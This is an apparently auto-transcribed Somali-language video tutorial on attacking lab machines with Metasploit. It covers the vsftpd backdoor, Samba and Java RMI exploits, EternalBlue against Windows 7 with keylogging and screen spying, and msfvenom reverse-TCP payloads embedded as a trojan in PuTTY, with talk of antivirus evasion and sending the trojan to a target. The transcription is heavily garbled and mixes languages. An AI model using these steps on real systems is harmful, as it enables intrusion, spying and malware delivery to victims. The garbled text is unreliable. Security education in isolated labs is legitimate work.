waxa iraadaysaa markaan exploit iraadi okay search qad ma qoray okay type okay exploit ku haboon iraadi version kan hadhoodii saasa leedahay يعني معناه محاوي version كان أنصو هلا محا exploit ku haboon exactly version كان هذا رادين is exploit ku haboon ayuu ku soo qabanaa oo rankigiisan uu yahay excellent sanad kala soo saaran ay tahay 2011 exploit name kiisan waa kana exploit way Unix oo ka sii yahay maxaa yeelay system kan waa Linux kan waa part of Unix version ka ama service ka aad rabtay inaad exploit ku sameyso FTP version ku uu leeyahayna waa backdoor ma fahant hadda aad gashid qaybtii oo moduleski hadhoodii waa ku arki kartaa scriptiga noocan uu isticmaalayo see uu isticmaalayna marka exploit marka rabtid maxaan dhahnay set ma dhehaysid waxa dhahay use waxa leedahay use 0 hada use 0 dhaho iyo hada intaan soo koobiyeeyo aan dhaho intaan dhan soo koobiyay right click copy dheh kadib waxa dhahdaa use control shift v intaan dhaho ina simply aan dhaho kaliya fadlan 0 maadaama nameka exploit kan oo numberkii 0 yahay 0 isticmaal isla markii uu isbedelo da scanner ku jirnay hadda maxaa isticmaal exploit auxiliary wuxuu isku bedelay exploit now options aan leedahay maxaa liiga baahan yahay marka si exploit kan loo ran gareeyo waxa laga baahan yahay arrimaha soo socda waxaan required nooc ha isku shideenin laakiin waxa yes remote hostiga ama targetkaagi waa ever fadlan targetkaagi soo gali portiga uu ka gareyn lahaa 21 way oo u mari lahaa si uu systemkaas u galo laakiin yaa la gala cidii la gali lahay waa kana hadan gelinayna marka set waxaan leenahay r host waxaan leenahay 192 waa Linux-kii 128.2.0 waa r host waa Linux host 128 wata waa set upgradeynay wax walba waa set automatically payload ku haboon by default asaga qaadanayo okay hada show payload ki tusi oo qaadanayo wuxuu qaadanaa payload noocan u qaadanayo compatible payload ka
ku habboon oo loogu talagalay haddaa exploitkan isticmaalaysid waa kana by defaultina asaga qaatay kuma tusinayo laakiin wuxuu qaadanaa payload wax la dhaho cmd unix interactive payload kan uu wataa laakiin anaga maadaama aan dhahday options ka dhexdiisa oo payload uusan kugu tusin options marka command-kan rangaraysay inta uu kugu dhex tusinayo oo kaliya ayaad isticmaalay wuxuuna tusiyay hadda anaga oo required noo ahaa kan wax payload ma inta ku jiro maya hore u soo marka waxa leedahay ama exploit leh ama run de isku mid waa exploit dhahday calaamadaha cagaarka plus waxay ku tusinayaan in systemka the backdoor surface has been bounded macnaheed maxaa backdoor ayaan ka helnay sidoo kale qaybta labaad waxaa helnay user root ah macnaheed maxaa user admin ah in Linux waxaan isticmaalnaa userada super powerka ah oo xoog badan root user in Windows waxaan isticmaalnaa admin user macnaheed maxaa user awood badan ayuu helay systemkan as a backdoor ayuu u galay waxaana uu helay shell wax la dhaho shell waa albaab ama connection ah hesha waa haddaan maqashid command shell session 1 opened macnaheed maxaa waaye connection 1 ayaa kuu furan hal connection ah haysataa connection 1 opened albaaba kuu furan annaga IP-geena waa kana okay IP-ga aan dhex galnayna waa kana waqtiga la dhex galayna waa ka haddaa fiirisid hadda dhahid ls waxaa arki doontaa dhammaan folderada ku dhex jiro ama documentiska ku dhex jiro haddaa dhahid bwd oo print working directory lagu soo gaabiyey meesha aad joogtid waa ujeedaa waa root file systemka waxaa ka joogtaa qaybta rootka haddaa rabtid uname-a dheh waxaa hubisaa wuxa uu yahay Linux Metasploit oo kasii yahay versionkiisa waa server nooca Metasploitable ah haddaa rabno inaan dhahno help maxaa anaga hadda naloo ogolyahay commandiska meta shell commandiska hadda macquulka ah la rangareyn karo waa kana help aad sameyn kartaa background aadi kartaa session aadi kartaa shell oo ah in aad gudaha systemka u sii gashid upload download waxaas oo dhan okay let's aan dhahno shell oo kale shell macnaheed maxaa waaye gudaha systemkaas inaa u gashid gudihiisa aan gashid systemka laga hadlaayana waa Metasploitable userka aan soo helnay hadaa root u ahaa Metasploitable ku gudihiisa aan ku jirnaa haddaan hadda dhahno pwd root kan joognaa okay ls documentiyadan folderadan ku jiraan home aan galeynaa si aan desktop u gaarno waxaan leenahay cd home kadibna ls waxaa ku jiro ftp msf admin waa userka local username ka waaye oo loo yaqaano Metasploit kan username-kiisa cd msf admin okay clear kadibna ls dheh kadibna intaano xooga ku jirto okay waxaa ku jira invoice.txt ana mar hore geliyay vulnerable folder la dhaho hadda halkan fiirisid hadda inta ay imaatid oo ls dhahdid macnaheed maxaa waaye labadaas ku jirto fiiri invoice iyo vulnerable inta waxaa sameyn karnaa inaad systemkan gudihiisa inaan ku jirno saa u cadeeno مثلا waxaan sameyn karnaa inaan folder kala sameyno mkdir oo ah make directory oo la dhaho hacked oo kale okay hadda ls dhahdid inta waxa ugu jeedaa inaan new folder ku soo darnay oo hacked la dhaho hadda halkan fiirisid hadda kuma jirin laakiin hadda marka ls dhahno ls waxa ugu jeedaa new folder oo la dhaho hacked ku soo zaa'iday okay aan isku dayno inaan tirtirno waxaan leenahay remove waxaa tirtirtaa hacked okay remove hacked is a directory macnaha hacked remove oo kaliya laguma tiri karo waxa waaye directory macnaha folder waa uu adag yahay yani wuxuu u baahan yahay dash force oo kale ama dash r oo recursive ah inaad isticmaashid folder saas aad ku tirtid hadda wuu tirtirmay hadda ls dhahdid waa delete hadda halkan imaadid folderkii ka raadisid hadda ls kuma jiro okay aan fiirino marka another software kale ama application kale aan isku dayno inaan galno مثلا tusaale ahaan smtb oo kale smb kan oo kale aan fiirino smb hadda version kan anaga ma hubno hadda aan dhahno samba aan soo qaadano copy aan halkan imaano aan dhahno search exploit okay control shift v samba noo raadi wax badan macluumaad badan oo noo keenay
okay Samba versionadooda waa kana laakiin specific versionka anaga aan rabno seen ku ogaan karnaa. Okay waxaan la imaanaynaa Metasploit keena control C aan leenahay qaybtan y sessionkan maro ka back clear new vulnerability kala anagu ka faa'iideysanayno aan systemkan gudaha u galno control shift v waxaan leeyahay waxa ii raadaysaa Samba search Samba. Okay Samba markaan fiirino wax badan exploit wuxuu leeyahay auxiliary anaga auxiliary hadda u baahanay versionka saxda ah inaan helno intaan laakiin mid version ah kuma wajiro badana version arna inaan ogaano Soomaa aan ku raadino search smb type auxiliary si aan version u helno. Okay auxiliary scanner smb version. Okay kanaan qaadanaynaa marka waxaan leenahay use waxaan u raadaysaa auxiliary version kadibna waxaan leedahay options maxaa liiga baahan yahay waxaa required oo kaliya remote hostiga rabtid inaad versionka lagaaga baaro set r host 192.168.206.128. okay r host wax walba waa set r port looma baahna maxaa yeelay auxiliary isticmaalona hadda portigan required ma aha aad rabtidna waa gelin kartaa laakiin since oo required uusan ahayn run oo kaliya dhahaysaa. okay scan completed laakiin waxaa halkan ku ogaanay host could not be identified hostigan ma fahmi karno ku dhahay laakiin versionkii oo aan rabnay haday meeshan muxuu dhahay 3.x laakiin hadda 3.x 3.0.20 waay hadda halkan fiirisid 3.x.4 uu dhahay versionka saxda anaga haday ma aanan ogeyn laakiin versionka saxda hadda waa ogaan Soomaa. hadda waxaa la imaanaysaa meeshii ha fiirsid search exploit intaan gelisid inta hadaa gelisid exploit ma jiraa yes exploit title wuu ku siiyey weliba Metasploitable xitaa waa ka helaysaa ayuu ku dhahay. Metasploit markaan ula aano maadaama versionka aan helnay waxaan leenahay search waxaan leenahay versionkeena inuu geliy kadibna waxaan leenahay type waxaan u raadaysaa exploit hadaa helaysid exploit qaldan aan qoray type waxaan u raadaysaa exploit. okay now wuxuuna sii rank excellent exploit ku haboon. okay wax kale ma sameynayno waxaan leenahay use 0. okay hadda muxuu isticmaalay exploit-ka noocan ah kadibna waxaan leenahay options option looga baahan yahay markaa fiirisid payload-kan ayuu soo qaatay awalka hore payload ma ku sii jirin laakiin hadda muxuu ku leeyahay payload option-ka aan isticmaalayo waa cmd kadibna waa unix maxaa cmd aan ku siin doonaa waay unix reverse shell netcap aan isticmaal hadaa rabtid waa ka bedeli kartaa hadaa dhahdid مثلا show options show payloads 47 payload oo compatible ku ah oo isticmaali kartid jiro hadaa exploit kan isticmaashid all these isticmaal kartaa kuwan waa bind shell fiiri kuwa waa reverse kuwa php kuwa whatever. okay anaga hadda wax ma ka bedeleyno midkiisa hadda oo asaga uu soo qaatay compatible ka maxaa yeelay Samba noociisa waa Unix maxaa yeelay markii uu window yahay Samba ma noqon doon SMP oo noqon doona maadaama Unix uu yahay wax walba ay u saxan yihiin lport fiiri waxa required lhost remote host IP giisaan gelino portiga 139 oo soo qaatay hadda halkan fiirisid portiga Samba waa 139 by default isaga geliye. okay anaga hadda waxaan ku dari doono waa inaan set up gareeno r host 192.168.206.128 and options again everything is set. now portigan by default waxa iska leh Metasploit isaga ku set up gareey laakiin waa ka bedeli kartaa lport waxa ka dhigi kartaa 4499 yani just waxa adiga rabtid ka dhigan kartaa meesha adiga lagaaga la soo xiriirayo waay IP gan waa IP ga
uu leeyahay Linuxka haddii aad rabto IP address dheh waa kana ujeeda ama saanda ku wareeraysid if config dheh IP uu leeyahay Linuxka waa IP-gayga aniga aan isticmaalayo Kali Linuxka options hada dhahdid marka IP-gaygi wixii dhan asaga geli portiga daarto bedel kartaa dhig kartaa wax kaliya anaga hada aan ku saxnay aan gelin kan waaye payload kan automatic ku isticmaalayo now exploit ama run okay it means waxaan dirnay gantaalkii waxaan sugaynaa in aan shell helno maxaa lagu dhahay command shell session 2 open it haday ftp session 1 u ahaa again another session lakin still remember session ka gudaha ugu jirtaa laakiin ma dareemost adiga laana meterpreter iyo waxyaabahaas ma arkoosid saan markaa fiirisid ls daadid waxa ku jirtaa gudaha pwd print working directory root ka joogtaa haddii hadda aan shell dhaho waxaan gudaha ugu jiraa waxyar kadib inuu ka mujeda root yani waxa ku jirta shellki okay now aan fiirino maxaan kaloo ka faa'iideysan karnaa tolo waxaan kaloo ka faa'iideysan karnaa waxyaabo oo na siinayo meterpreter inaan aragna rabna mesela java rmi gaan oo kale okay java rmi gaan ayaan raadinaynaa java noo soo qabo java kanaan ugu dambaysiinaynaa markaan window u gudbaynaa search waxaan leedahay java yiraahdo java waa badan yahay 709 laakiin aniga waxaan rabaa rmi haddaan ku daro mesela tusaale ahaan haddaan dhaho search rmi 600 waa badan tahay okay java rmi 38 kana macquul ah kan marka haddaan sii weydiiyo aan dhaho waxaa ku dartaa type auxiliary iraadi kan macquul waay waxaan isticmaalaynaa 0 okay waxaan leenahay use 0 kadibna waxaan leenahay options kadibna waxa kaliya laga rabo maxaa waaye host waxaa gelisaa 192.168 okay and options markaan just run leenahay send in rmi header I hope in uu ku fashilmay calaamadan maxaa waaye yani failed waa mujeda laakiin bal aan exploit kiisa raadina bal waxaan leenahay java rmi instead of waxaan dhihi lahayn sukiya waxaan raadinaynaa auxiliary bedelkeeda waxaan ku raadinaynaa type exploit maxaa heli kartaa auxiliary waa ku fashilanay wuxuu leeyahay wax ma hayo bal aan exploit raadino exploit browser marabo java rmi exploit java rmi server okay midkan number 6 ka kan ayaan raadinayn macnaha multi sababta aan u raadino multi kan very kan browser waaye kan laakiin browser ma macnaha mid aan browser ahayn raadinayo use waxaan leenahay browser exploitation marabno marka fiirsid default no payload configured laakiin default into java maadaama aad java wax ku raadinaysid meterpreter reverse tcp connection tcp oo java aan ku sameyn intiisan ku isticmaalaynaa options waxaan leenahay maxaana looga baahan yahay markaan ciyaarto soo balaaratay way weyntahay waxaan required yes ka afeeri kuwa asaga portiga asaga noo xareeyay portigiisa waa kana marka fiirsid port 1099 asaga noo geliyay portiga okay host delay http delay waxaan asaga sida u geliyo u deynayna kan banaan oo kaliya aan mar gelino set host 192.168.206.128 kadibna options leh again ip ga waan gelinay wax walba waa okay server host wax ma ka bedelanaysa u deynayna ip ga waa kana portigan nagala soo xiriira hadaan rabno bedeli karna hadaan rabno sidaan u deynayna kadibna maxaan leenahay exploit token waxaan rabnaa inaan meterpreter session inaan helno session 3 yes waxaan ka hadlayo waa kana meterpreter session waa payload ka awood badan kuwii haday upload file-kii waxaas noo diiday markaan waxaa qasab ah in aan wax walba sameyn karno waxaan sameyn karnaa screen share waxaan sameyn karnaa screenshot
waxaan sameyn karnaa waxyaabo badan shell inaan gudaha u galno oo gadaal usoo baxno oo get user id something network la xiriiro network commands system commands execute file sameyn kartaa yani a lot of commands. Now aan marka tijaabina marka waxaa leedahay sys info systemkan information exe systemkan wuxuu ku leeyahay computer name waa exploitable waaye 86 architecture kiisa waaye java linux aan kicisay. Okay, now haddii aan rabo mathalan inaan upload dhaho kale horta aniga pwd da root kan jooga ma okay cd waxaan leenahay home waxaan leenahay waxaad aadaa msf admin. Okay, kadib hadda pwd da msf admin aan joogta ls waa failalkii invoice-kii iyo vulnerable hadday wixii meeshaan yaale waay markaa fiirisid ls invoice iyo vulnerable. markaan meterpreter wuxuu awood badan tahay kuwa kale upload way ka awood badan tahay upload saan u qoran horta upload saan waay upload pass.txt mujeedaad exact isla markii file oo cabirkiisa intaan yahay byte yahay oo filekana meesha uu yaal waa kana xataa lagu sheegay home kali desktop pass.txt ayaa la soo xawilay waxaana hadda complete laga dhigay uploadkiisa hadda ls dhahdid marka fiiri pass.txt uu yaala halkan marka la fiirisid ls. Now aan isku dayno inaan ka tirtirno remove pass.txt. Okay, halkan imaw marka la fiiri ls done. Okay, marka sida dalkan nooga muuqato meterpreter uu ka awood badan yahay sessionada kale ama shellska kale ee helaysid. halkan waxaan ku joojinaynaa linux server vulnerability leh anagoo ka faa'iideysanayno in aan metasploit framework ku isticmaalno. haddana waxaan galaynaa inaan sameyno windows inaan ka faa'iideysano waxaan leenahay kan exit clear kan waa iska daminaynaa waxaan leenahay shutdown waxaan shidanaynaa windowgeena. Okay, windowgan vulnerability uu leeyahay vulnerability aan rabno inaan ka faa'iideysano ama aan u isticmaalno waxaa loo yaqaanaa eternal blue vulnerability. eternal blue waa raadin kartaa eternal blue eternal blue aan ka rabahaa. eternal blue vulnerability waa computer software vulnerability ay develop gareysay ama ay sameysay USA gaar ahaan qaybta loo yaqaano NSA ama National Security Agency oo ay leedahay dowladda Mareykanka 2017 ayaa la ogaaday. waxaana lagu ogaaday NSA ayaa waxay xaqiiqsatay in vulnerability-gan la hagareeyay oo ay hagareeyeen group la dhaho shadow brokers. shadow brokers waa group oo hackers ah waaye oo la ogaaday 2017 in ay jabsadeen ama ay heleen vulnerability-gan la dhaho internal blue. marka this vulnerability internal blue-gan 2017 isla vulnerability-gan computer leh ayaa laga faa'iideystay oo ku dhaceen ama loo isticmaalay ransomware attack weyn oo loo yaqaan WannaCry caan waaye 2017 in ka badan 150 dowladood ayuu WannaCry ransomware attack u gaaray. marka ransomware attack waxaa loo isticmaalay vulnerability-gan uu leeyahay eternal blue-ga. marka WannaCry waxaa loo isticmaalay computerada aan laga badge gareynin eternal blue vulnerability. magac gooni ah loo sameeyay magaciisa waxay ka dhigeen MS17 something like that magac noocaas ay siiyeen waa kana. okay, meelahan aan ku aragnaa laga yaabaa waa kana magacan ay siiyeen MS170110. magacan marka anagoo ka faa'iideysanayno vulnerability-gan inay uu leeyahay window-gan iyo in kale magacan haddaan soo koobiyeysano vulnerability-ga aan ka jeegareeno مثلا hadda kan cat windows 7 isagana scanka aan ku sameeyay intaanu port ayaa furan. kii hore aad portiyo badan aan furnaa laakiin kan oo 65535 port all ports marka scan ku sameeyay intaana ka furneed. marka vulnerability-gan wuxuu isticmaalaa this port
portigan la dhaho 445 marka aan baarno in uu leeyahay iyo in kale hadda inta fiirisid oo search control shift v eternal blue ms17 waa kana uu leeyahay database kan gudaha uu ku jira macna Microsoft Windows waa laga helay eternal blue marka fiirisid wuxuu ku siinaa SMB remote code execution Metasploit kan waad ka helaysaa gaar ahaan kan hadda anaga aan weydiinay specifically pathkiisana waa kana xogo kale oo dheeraad ah waa kana anaga scanner kan ka bilaabeena Metasploit in scannerkiisa raadino waxaan leenahay okay marka vulnerability gan hadaan gudaha u sii galno wuxuu ka faa'iideysanaa SMB vulnerability uu leeyahay gaar ahaan SMB version 1 marka Windows-yada oo hadda dambeeyay badankood waa laga batch gareeyay laakiin Windows 7 wuxuu ku jiraa Windows-yada aan wali laga batch gareynin laga update gareynin vulnerability-gaas waxaan leenahay search ms17 kadibna waxaan leenahay type waxa ay raadinaysaa auxiliary okay auxiliary SMB scanner kana rabnaa anaga hadda kan admin way qaybtan kore kana waa scanner marka muxuu ku raadinaa labadan double pulsar waa another vulnerability kale eternal blue labadaanu scanner kan ku raadinaa marka waxaan leenahay search kadibna waxaan leenahay use waxaan leenahay midkan isticmaal kadibna options maxaa laga baahan yahay waxaa laga baahan yahay module kan wax walbo yes hadda waxa yes ah in aad arrow sii gelisid port 445 oo uu ka raadin doonaa waana saxan yahay portigaas waaye set waxaan leenahay arrowhost 192.168.206.129 kan 129 waaye mar horaan soo hubiyay IP-giisa waa kana 129 waaye okay marka had options dhahdid everything is great and set let's run gareeno inuu vulnerable yahay systemkan in kala ogaano calaamada cagaarka daafirus muxuu ku leeyahay host is likely vulnerable to vulnerability gan uu waxa u maleynayo ku leeyahay mostly inuu vulnerable yahay noocu yahay inuu ku sheego Windows 7 professional way okay anagu ka faa'iideysanayna marka aan intaan marka la dan soo koobiyano waxaan leenahay bal exploitation kiisa noo raadi maadaama inuu vulnerable yahay aan oo sheegtay waxaan noo raadisaa exploit noo raadi waxaan raadisaa exploit noo raadi exploit ku haboon 22 exploit way midkan double pulsar way midkan waa BS execute midkan internal blue ana kana qaadanayna marka midkan internal blue ah aan qaadanayna waxaan use isticmaal this and please no check maxa options ah options markaan way badan yihiin horta wuxuu ku dhahay payload ka by default oo ku qaaday waa Windows kadibna x64 aad wax soo sameeyaan macna architecture operating system x64 aan ku qaaday Meterpreter reverse TCP maxaa required ah rhost okay set rhost 192.168.206.129 okay again everything is set payload ka asaga by default ku saxay payload ka aan ku qaaday waxa way ku leeyahay payload x64 Meterpreter maxaa yeelay sababtoo ah exploit ka uu isticmaalo option kiisa ayaa kan ku haboon payload kan ku haboon okay hadaa rabto waxaad dhigi kartaa show target okay intaan oo target ayaa la isticmaali karaa mujada automatic target waayo ku leeyahay mid ku doona ba ahaado laakiin adiga payload ka x64 maadaama uu yahay Windows 7 uu yahay PC gaaga waxaad dhigi kartaa set target 1 maadaama PC gaaga Windows 7 uu yahay yani target ka waa ogtahay inuu x64 payload kiisu uu yahay x64 oo ka siiya Windows 7 adiga Windows Server matid 8 matid Windows 10 matid Windows ka tahay ku sii gareysanaysa marka hadda day automatic meesha uu ka hadda Windows 7 waa target keen wax walba inuu set up gareysan yihiin na waxaan leenahay am run de am exploit de whatever okay fail really it means exploitation keena uu fashilmay okay soo daahitaankiisa aan aniga ka dareem inuu fashil soo wado okay aan fiirino mar kale sababtoo fail garoobe still waa sugeynaa connecting to the target for exploitation
okay mar kale exploit ahno bal aan fiirino hadaa uu naga diiday toogtan aan fiirino marmarka qaarkiis wuu diidayaa marmarka qaarkiisna wuu ogolaanaa yani sometimes buggy iyo waxyaabahaas uu leeyahay hadduu markaa diido mar kale lagu celiya hadaa wuxuuna dhahay fail laakiin mar labaad aan ku celinay waa win hadda macnaheedu waxa waaye waa ku guuleysanay now we are in the system okay system kan waa target PC target macna computer ne magaciisa target aan u bixiyay Windows 7 waaye okay 64 bit uu ka yahay two users ku jirto waa userada mesela admin userka iyo userka normalka ah Meter Operatorna x64 Windows ayaan hadda ugu jirnaa haddaan dhahno help waxaan awoodi karnaa intaan oo commands inaan run gareyno waxaan run gareyn kartaa commandiyada waxay u kala qaybsamaan core commands oo ay kamid yihiin kuwan mesela in aad background taad kadib aad usoo laabatid oo kale background maxaa laga wadaa bg haddaan dhaho hadda shaqooyin kale aan qabsan karaa session-kayga weli waa haystaa sessions haddaan dhaho session 1 oo ah Meter Operator window oo NT level authority macnaha level system NT level ayaan hadda ku jirnaa oo waxa macna awood oo user awood badan haysanaa yani okay sidoo kale tana session kan xilligan rabnaa gali karnaa haddaan rabnana inta ayaan waxyaabo kale ku qabsan karnaa yani if config inaan dhaho hawlo badan qabsado nmap scan inta ugu sii dirsado nmap scan dash something porty مثلا 443 inuu furan yahay IP gan iyo hubiyaa dhigi kartaa isla IP gan ama waxaa tiri مثلا waxaa rabtaa inaad ogaatid SSH ma lagu geli karaa amal port 22 inuu furan yahay fadlan iyo hubiyaa dhehaysaa okay scan ku sameynaa nmap dhexdiisa wuxuu ku leeyahay portigan waa ka xiran yahay port 22 waa xiran yahay waa ogaat macnaha another exploitation kale inaad sii samaysid hadhowdii inaad session-ka u lahaawtid markaa rabtid maxaa dhehaysaa session is session ID-ga fiirinaysaa session 1 oo keliya dhehaysaa kadib PC-gii gudihiisa sidaas uga sii jirtaa waxyaabo badan aan samayn karnaa oo ay kamid tahay screenshot ay kamid tahay file inaan tirtirno ay kamid tahay file na soo gelino in upload ku sameeyno in download ku sameeyno wax badan مثلا screenshot aan dhahno screenshot waxaan loogu save gareeyay home kali desktop VO waxa uu dambeeyo way desktop ka imaano mujeda windowgi gudihiisi ayaa screenshot na loogu soo qaaday okay مثلا waxaan dhihi karnaa help waxyaabo aan sameyn karno waxa kamid ah key scan start key scan stop oo ah wax walbo keystroke ah inuu ku capture gareeyo ku save gareeyo screen share aa sameyn kartaa in screen daawatid ninkan wax walbo desktopkiisa real time ina u daawatid oo ninkan aad kor kala socotid مثلا hadda daan dhaho screen okay screen share hawjeda screen share wax walbo screenkiisa real time ina ka daawatid saacada hadda la joogo ujeeda waqtiga ay tahay saacadan IP address-ka aad daawanaysid playing yani wax walbo sameeynayo shaashadaas ka daawanaysa hadda hadii aan halkaan fiirino aan soo bixino laba shaashad aan ka dhigno fiiri internetkii culays waay ujeeda waxaan sameeynayo shaashadeeda window-gan ku dhex jira hadda waa dhaqdhaqaajinooya Linux-ka dhexdiisa ay dhex arkoosa user-kana soo qaada intee dhiga inta ujeeda waxaan sameynayo right click aan leeyahay ujeeda wax walbo sameynayo qofka marka gudaha u gashid full control yani systemkiisa ku dhex jirta banaankaas ka daawanaysa okay halkaan uu galay okay waxbuu qorqortay مثلا si aan u soo xasuusto hadhoodii login credential-kayga waxaan ka dhiganaa abdi 123 password-kayga saan u iloobin odayaan ahay saan u xasuusto waxaan ka dhiganayaa hooyo 2026 stick note-kan intaan ku sii diyaarsanaa si mar walbo aan u xasuusto gmail-kayga iyo password-kiisa remembering amal okay laakiin ogow PC-gan waxaan ka daawanayaa Linux-kayga dhexdiisa meesha aan ku dhex jiro waa Linux screen-kiisa ayaan kor ka daawanaa marka screen share-kan hadda daan dhaho control C aan joojiyo marka imaadid inta
wixii uu istaagayaan wixii hadda aan sameynayo ma arki doontid macnaha hadda fiiri waxbaan sameynaya hadda ma arkaysid ase sawir ahaan oo inta kugu muujinaa laakiin waa dhamaaday macnaha live feedkii heleysay kuma jiro. Okay, that's commands-ka la sameyn karo markii system gudihiisa aad gashid. System markaa gudihiisa gashid according to Meter uu ka awood badan yahay payload-yada kale ama sessions-ka kale ah heleysid. Command-yada halkan ku jiro way badan yihiin. Halkan waxaan ku joojinaynaa qaybteeni ahayd in system vulnerable ah ayadoo laga faa'iideysanayo in la hagareeyo sidee loo isticmaali karaa Metasploit. waxaan u gudbeynaa laabkeena qaybta saddexaad oo ah ama qaybta labaad aan dhaho system vulnerability aan lahayn sida Windows 10 kan oo kale soo laga faa'iideysanayo magaciisa muxuu ahaa Metasploit framework sidee attack loogu sameyn karaa. Okay, halkan waaye halka marka aan sameynayno wax loo yaqaano custom payload. Custom payload maxaa loola jeedaa? ciyaarta markan waxa waaye waxaan isticmaali doonaa toolkeeni caanka ahaa ee loo yaqaanay MSF Venom ama MSF Venom tool ayaan waxaan ku sameyn doonaa custom payload. MSF Venom maxaa loo isticmaalaa? waa standalone payload generator. Payloadkan aan sameynay ayaa waxaan u diri doonaa systemkeeni updated ka ah systemkan oo hadda aan isticmaalayno. Userkan waxaa lahaa Katib. Okay, passwordkiisa aan gelino. Systemkan marka oo Windows 10 kan ah ayaan waxaan u sameynaynaa standalone payload anagoo isticmaalayna MSF Venom. Payloadkan aan qofka ku triggereynaa مثلا qofkan waxaan ogsoonahay network admin oo kale waaye ama qof IT waaye مثلا waxyaabaha aad aan u isticmaalno kale anaga waxa kamid ah application kan la dhaho Party oo kale aan tusaarada u soo qaadanaa. Party kan waa application caadi ah. Application kan legitimate ka ah oo Party oo kale inaad qofka dhahdid aad yani ugu soo dartid malware aad embed uga dhigtid macnaha maxaa waaye Party waxa uu ku noqon doonaa Trojan horse. waxa ku dhex dari doontaa application malware ah. Malwarekaas application-ka aad sameysay ayaa qofkii u diraysa waa marka application ahaan ay tahay. haddii kaleetana malware kan oo kale hada malware waaye PDF kan waa malware kan waa malware kan waa malware waxaan meeshan lab waa aniga aan u isticmaalo waa PC gan inaan malware ku tijaabiyo. By the way waxaan kas off ka dhigay antivirus-kayga ama Windows Defender-kayga off waaye maxaa yeelay malware-ada aan ku sameynayno MSF Venom dhammaantooda way hayaan security operations-ka. مثلا هذا mid aan boobsiis ku sameyno MSF Venom -b Windows Bears TCP -lhost is equal 192.168.206.20 lport is equal 444 kadibna file exe samee igu save gareey here.exe. payload-kan aan soo qaadayna wax yaraan ku tusinaa. Payload-kan waa MSF Venom. Payload-ka uu save gareey hadda dhahdid md hashkiisa soo qaadid md5 some here.exe oo hashkan aad soo qaadatid ama application-ka dhan aad soo qaadan kartaa oo aad la imaadid مثلا like virus total oo kale aad la imaadid aad kadibna baartid application-kan system-yada defense-ga ah oo dhan way hayaan mostly inta la imaadid search dhahdid kadibna aad ku baas gareysid hashka file-ka iraadi aad dhahdid waxa ogaan doontaa hada fiirisid wuxuu ku tusinayaa we don't currently have comments for really wallahi aan dhahno file-ka dhan soo geli choose na aweyki hadda aan sameynay here akhbaar khayr laa ii sheegaysaa confirm upload macnaha system-yada oo defense-ga ah inuu nooga baaro in uu yahay Trojan ama halis inuu yahay in kale. maxaa u jeedaa hadda almost all of the antivirus systems-ka ama security protection systems-ka 72
dhamaantoodii 72 hadda waxaad uu soo qabtay way ka badan yihiin laakiin content state kamid ah waxay dhaheen waxaan yahay waa Trojan backdoor way metaperimeter loo isticmaala waa Trojan way yaqaanin saas daraadeed anaga hadda for security lab testing only waxa hadda sameeynay waxa waaye either hadda hash ka soo qaadatid aad ku baartid xitaa hashkan waxaa la rabaa inuu soo qabto way uusan soo qabanaynin aan fiiriyo search waxbaan ka tagay aniga hashka daay ama erayaan ku daraa umaleena qasab way isleeyihiin hashka waa fileka specifically waxa waaye wax lagu aqoonsiga filekaas ama applicationkaas waa hash value-gaas wuxuu la macno yahay in applicationkaas aad soo geliso oo kale applicationadan marka oo ku lagu dhex sameynayo MSF Venom waa kuwa dhamaantoodii ay ka warhayaan security vendorska ama security platformska ay wada og yihiin saas daraadeed annaga marka Windows 10 keena si oo laabka uusan nooga halaabin Windows 10 keena marka waxaan ka xirnay Windows Defenderka marka haddii marka qofka uu rabo inuu system compromise ku sameeyo muxuu sameynaa marka wuxuu sameynaa wax loo yaqaano undetectable payload UDP undetectable payload marka undetectable ama fully undetectable food waa loo yaqaanaa FUD fully undetectable qaab loo sameeyaa jiro haddii hadda aad baartid oo aad dhahdid full undetectable payload creation waxaa arki doontaa kuwo badan oo ku dhahayo undetectable Windows payload anaga sameeyno faylashan kuwaan dhan oo kuwa ku tusinayo sida loo sameeyo undetectable payload programs ku tusinayo waa la raadiyaa waa la baaraa undetectable payload macnaheed maxaa waaye generating multi OS fully undetectable payload hada kan research kan sameysid waxaa la soo saaray 2022 programmada loo isticmaalo create evasion food payload and reverse shell using nim waa program kale asagana sameeyo programming language nim la dhahayo application lagu sameeyo waaye qaab badan jiro faad labkan marka waxa rabaa in sidii wax u dhacayaan inaan isla aragno saas daraadeed marka anagoo ka faa'iideysanayno application aan soo dejiyay application kan waa application ka la dhaho party okay party-gan waa application ka halkan ka muuqdo anaga aan caadi u isticmaalno party waxa loo isticmaalaa SSH connection from one PC to another PC one person to one server to another server in add connection oo ku sameeyo marka legitimate waa application caadi aan isticmaalno waay marka aniga waa soo dejiyay application-ka oo legit ka waxaan sameynaynaa malware kan waxaan ku dhex embed gareynaynaa ama dhex gelinaynaa party kadibna qofkii waan u diraynaa markaasna waxaan sameynaynaa in application-ka uu ran garay kadibna aan connection saas ku helno connection-kan yaa noo sameeyay application-kan vulnerability ma lahan laakiin waxaan dhex gelinay Trojan malware malicious malware-ka oo uu noo sameyn doono hadda MSF Venom waxaan ku sameynaynaa hadda malware waxaan leenahay clear screen ls remember hadaad aadid ls exe saddexdaan haysanaa kankii hadda aan sameyno waay kan waa program hore aan sameynay kanna waa booty oo legit ka ah msf sudo msf venom -b waxaan leenahay windows payload kiis anaga aan arko windows waay x64 oo ka yahay windowgeena metaperimeter aan ka rabnaa kadibna waxaan ka rabnaa reverse tcp hostiga oo anaga dhoodii oo lala soo xiriiri doono waa linux kaaga kaaliga 192.168.130 okay port waxaan leenahay portigeena waxaan ka dhiganaynaa 1111 waxaa rabtaa ka dhigan kartaa -x waxaa laga wadaa application-ka booty oo saxda ahaa oo arabti in la dhaxgalo sameynaysa -f kadibna another application kaleete ii sameey oo waxaa ku soo saartaa bidile capital ka dhig soosan u shakinin booty exe kadib intaan ii sameey password keeni kali aan gelino marka hadda wax kale ma aan sameynin
